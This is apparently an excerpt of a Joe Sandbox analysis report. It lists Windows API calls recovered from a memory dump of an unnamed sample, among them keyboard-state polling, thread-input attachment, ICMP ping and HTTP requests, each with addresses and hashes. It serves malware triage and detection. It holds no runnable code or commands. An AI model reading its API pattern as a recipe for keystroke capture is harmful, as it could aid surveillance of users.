                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00EE369E
                                                                                                                                  • GetKeyState.USER32(00000012), ref: 00EE36B0
                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00EE36C8
                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00EE36DA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                  APIs
                                                                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00EDA2AA
                                                                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00EDA2F5
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00EDA307
                                                                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00EDA327
                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00EDA36A
                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00EDA37E
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00EDA393
                                                                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00EDA3A0
                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EDA3A9
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00EDA3BB
                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EDA3C6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2706829360-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA84A6: __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                    • Part of subcall function 00EA84A6: __itow.LIBCMT ref: 00EA8519
                                                                                                                                  • CoInitialize.OLE32 ref: 00EFB298
                                                                                                                                  • CoUninitialize.COMBASE ref: 00EFB2A3
                                                                                                                                  • CoCreateInstance.COMBASE(?,00000000,00000017,00F2D8FC,?), ref: 00EFB303
                                                                                                                                  • IIDFromString.COMBASE(?,?), ref: 00EFB376
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00EFB410
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00EFB471
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                  • API String ID: 834269672-1287834457
                                                                                                                                  APIs
                                                                                                                                  • WSAStartup.WS2_32(00000101,?), ref: 00EF86F5
                                                                                                                                  • inet_addr.WS2_32(?), ref: 00EF873A
                                                                                                                                  • gethostbyname.WS2_32(?), ref: 00EF8746
                                                                                                                                  • IcmpCreateFile.IPHLPAPI ref: 00EF8754
                                                                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EF87C4
                                                                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EF87DA
                                                                                                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00EF884F
                                                                                                                                  • WSACleanup.WS2_32 ref: 00EF8855
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                  • String ID: Ping
                                                                                                                                  • API String ID: 1028309954-2246546115
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00EEEC1E
                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00EEEC94
                                                                                                                                  • GetLastError.KERNEL32 ref: 00EEEC9E
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00EEED0B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                  • API String ID: 4194297153-14809454
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00EDC782
                                                                                                                                  • GetDlgCtrlID.USER32 ref: 00EDC78D
                                                                                                                                  • GetParent.USER32 ref: 00EDC7A9
                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EDC7AC
                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00EDC7B5
                                                                                                                                  • GetParent.USER32(?), ref: 00EDC7D1
                                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00EDC7D4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 313823418-1403004172
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00EDC869
                                                                                                                                  • GetDlgCtrlID.USER32 ref: 00EDC874
                                                                                                                                  • GetParent.USER32 ref: 00EDC890
                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EDC893
                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00EDC89C
                                                                                                                                  • GetParent.USER32(?), ref: 00EDC8B8
                                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00EDC8BB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 313823418-1403004172
                                                                                                                                  APIs
                                                                                                                                  • GetParent.USER32 ref: 00EDC8D9
                                                                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00EDC8EE
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EDC900
                                                                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00EDC97B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                  • API String ID: 1704125052-3381328864
                                                                                                                                  APIs
                                                                                                                                  • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00EEB137
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ArraySafeVartype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1725837607-0
                                                                                                                                  APIs
                                                                                                                                  • __lock.LIBCMT ref: 00ECBA74
                                                                                                                                    • Part of subcall function 00EC8984: __mtinitlocknum.LIBCMT ref: 00EC8996
                                                                                                                                    • Part of subcall function 00EC8984: RtlEnterCriticalSection.NTDLL(00EC0127), ref: 00EC89AF
                                                                                                                                  • __calloc_crt.LIBCMT ref: 00ECBA85
                                                                                                                                    • Part of subcall function 00EC7616: __calloc_impl.LIBCMT ref: 00EC7625
                                                                                                                                    • Part of subcall function 00EC7616: Sleep.KERNEL32(00000000,?,00EC0127,?,00EA125D,00000058,?,?), ref: 00EC763C
                                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00ECBAA0
                                                                                                                                  • GetStartupInfoW.KERNEL32(?,00F56990,00000064,00EC6B14,00F567D8,00000014), ref: 00ECBAF9
                                                                                                                                  • __calloc_crt.LIBCMT ref: 00ECBB44
                                                                                                                                  • GetFileType.KERNEL32(00000001), ref: 00ECBB8B
                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00ECBBC4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1426640281-0
                                                                                                                                  • Opcode ID: 47d6732a99478180622ef4a5e80a868f979a9a1a1fbb7070a54d372d14513f29
                                                                                                                                  • Instruction ID: 4ab14a8b651555bc9ed4ea796d610c5498c987294f5258666916602c41ee131f
                                                                                                                                  • Opcode Fuzzy Hash: 47d6732a99478180622ef4a5e80a868f979a9a1a1fbb7070a54d372d14513f29
                                                                                                                                  • Instruction Fuzzy Hash: A281AF709047498BCB24CF68C985EAABBF0AF45324F24526DD4A6BB3D1CB369803DB54
                                                                                                                                  APIs
                                                                                                                                  • __swprintf.LIBCMT ref: 00EE7226
                                                                                                                                  • __swprintf.LIBCMT ref: 00EE7233
                                                                                                                                    • Part of subcall function 00EC234B: __woutput_l.LIBCMT ref: 00EC23A4
                                                                                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 00EE725D
                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00EE7269
                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 00EE7276
                                                                                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 00EE7296
                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00EE72A8
                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00EE72B7
                                                                                                                                  • LockResource.KERNEL32(?), ref: 00EE72C3
                                                                                                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00EE7322
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1433390588-0
                                                                                                                                  • Opcode ID: 554a6331d815a77c31767ba515e717cb1c990ef13140747f3b2fa181533d4801
                                                                                                                                  • Instruction ID: 94bf9aafef04c4cf3d857a9b7945ff70605ececa0e1875fa17974794b7ee894b
                                                                                                                                  • Opcode Fuzzy Hash: 554a6331d815a77c31767ba515e717cb1c990ef13140747f3b2fa181533d4801
                                                                                                                                  • Instruction Fuzzy Hash: 7D31ADB190429EEBDB119F629D89AAB7BACFF08340B044425FD41E21A1E774D951EBA0
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00EE4A7D
                                                                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00EE3AD7,?,00000001), ref: 00EE4A91
                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00EE4A98
                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EE3AD7,?,00000001), ref: 00EE4AA7
                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EE4AB9
                                                                                                                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00EE3AD7,?,00000001), ref: 00EE4AD2
                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EE3AD7,?,00000001), ref: 00EE4AE4
                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00EE3AD7,?,00000001), ref: 00EE4B29
                                                                                                                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00EE3AD7,?,00000001), ref: 00EE4B3E
                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00EE3AD7,?,00000001), ref: 00EE4B49
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2156557900-0
                                                                                                                                  • Opcode ID: cbb8b61dda586d7bf4f24c04fd7b1c42a4b70604850bba209fe28261b5a1f604
                                                                                                                                  • Instruction ID: 0b41ecf7aa88f5e7831f5235a1f0c35dd7a0f7b0a161ff5785d36d50eb85f17a
                                                                                                                                  • Opcode Fuzzy Hash: cbb8b61dda586d7bf4f24c04fd7b1c42a4b70604850bba209fe28261b5a1f604
                                                                                                                                  • Instruction Fuzzy Hash: ED31A0B160024CBFEB209F56DC88B6AB7B9EB60315F144015F914E71D0E7F5EE459B60
                                                                                                                                  APIs
                                                                                                                                  • GetClientRect.USER32(?), ref: 00F1EC32
                                                                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00F1EC49
                                                                                                                                  • GetWindowDC.USER32(?), ref: 00F1EC55
                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00F1EC64
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00F1EC76
                                                                                                                                  • GetSysColor.USER32(00000005), ref: 00F1EC94
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 272304278-0
                                                                                                                                  • Opcode ID: 5106f684b36b70ced797851f81cb1326b9e4d978a451798d38297b1ced90b66e
                                                                                                                                  • Instruction ID: f9468508eeb27e56d14b86a943600c5512ce4f766ba28af6f6342c525dfcce95
                                                                                                                                  • Opcode Fuzzy Hash: 5106f684b36b70ced797851f81cb1326b9e4d978a451798d38297b1ced90b66e
                                                                                                                                  • Instruction Fuzzy Hash: 6C212C31500209EFEB21AB64EC49BEA7B75FB04325F144225FA26A51E1DB714952EF11
                                                                                                                                  APIs
                                                                                                                                  • EnumChildWindows.USER32(?,00EDDD46), ref: 00EDDC86
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ChildEnumWindows
                                                                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                  • API String ID: 3555792229-1603158881
                                                                                                                                  • Opcode ID: 61d754abc0346edf04c90f4995f2b92cf180444575705f065c7cacd45df0eb07
                                                                                                                                  • Instruction ID: 47318f6dffe97ff487cd30ad932caa65e13dd68935b98f45a47daf3750e679c2
                                                                                                                                  • Opcode Fuzzy Hash: 61d754abc0346edf04c90f4995f2b92cf180444575705f065c7cacd45df0eb07
                                                                                                                                  • Instruction Fuzzy Hash: EB919130A04606AACB0CDF64CC81BEAFBB5FF05314F14A11AD95AB7251DB30795BDB90
                                                                                                                                  APIs
                                                                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00EA45F0
                                                                                                                                  • CoUninitialize.COMBASE ref: 00EA4695
                                                                                                                                  • UnregisterHotKey.USER32(?), ref: 00EA47BD
                                                                                                                                  • DestroyWindow.USER32(?), ref: 00F15936
                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00F1599D
                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F159CA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                  • String ID: close all
                                                                                                                                  • API String ID: 469580280-3243417748
                                                                                                                                  • Opcode ID: 81ef080b19ab1bfeb69c761da7a20c8f4ee92eeb0b5a33494415d4b5a1ddf1a0
                                                                                                                                  • Instruction ID: fe1af54b87bfe61d8934a6ca979399157b72f1d8ca080ce48482b293d0f93de9
                                                                                                                                  • Opcode Fuzzy Hash: 81ef080b19ab1bfeb69c761da7a20c8f4ee92eeb0b5a33494415d4b5a1ddf1a0
                                                                                                                                  • Instruction Fuzzy Hash: 21913B75600602CFC715EF24C895AA8F3E4FF4A710F5062A9E50ABB2A2DB70BD56DF10
                                                                                                                                  APIs
                                                                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00EBC2D2
                                                                                                                                    • Part of subcall function 00EBC697: GetClientRect.USER32(?,?), ref: 00EBC6C0
                                                                                                                                    • Part of subcall function 00EBC697: GetWindowRect.USER32(?,?), ref: 00EBC701
                                                                                                                                    • Part of subcall function 00EBC697: ScreenToClient.USER32(?,?), ref: 00EBC729
                                                                                                                                  • GetDC.USER32 ref: 00F1E006
                                                                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F1E019
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00F1E027
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00F1E03C
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00F1E044
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F1E0CF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                   • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                  • String ID: U
                                                                                                                                  • API String ID: 4009187628-3372436214
                                                                                                                                  • Opcode ID: f86487a528a8cc3b1883ec885484734dcafed6aa097898da26cb2cf8bccad920
                                                                                                                                  • Instruction ID: 2e0c146600141160da8d128b37c8ddfd04a2f2c57b818571ad34da30fa7a39ca
                                                                                                                                  • Opcode Fuzzy Hash: f86487a528a8cc3b1883ec885484734dcafed6aa097898da26cb2cf8bccad920
                                                                                                                                  • Instruction Fuzzy Hash: 3B71E131900209DFCF218F64CC80AEA7BB5FF49364F284269FD566A1A6C7718D81FB61
                                                                                                                                  APIs
                                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EF4C5E
                                                                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00EF4C8A
                                                                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00EF4CCC
                                                                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00EF4CE1
                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EF4CEE
                                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00EF4D1E
                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00EF4D65
                                                                                                                                    • Part of subcall function 00EF56A9: GetLastError.KERNEL32(?,?,00EF4A2B,00000000,00000000,00000001), ref: 00EF56BE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                   • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                   • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1241431887-3916222277
                                                                                                                                  • Opcode ID: 61bce9b2ca99c82a357267faff92f9d1771bcded8ad6ee897a33d0fe19eedbcc
                                                                                                                                  • Instruction ID: 1f7dc685b8e096e29ae47c9c81e5c2e960e3b356f41a340c70eabf77077fcf55
                                                                                                                                  • Opcode Fuzzy Hash: 61bce9b2ca99c82a357267faff92f9d1771bcded8ad6ee897a33d0fe19eedbcc
                                                                                                                                  • Instruction Fuzzy Hash: 3A419CB150120CBFEB129F60CC89FFB77ACEF08314F10912AFB01AA191E77599459BA0
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F3DBF0), ref: 00EFBBA1
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F3DBF0), ref: 00EFBBD5
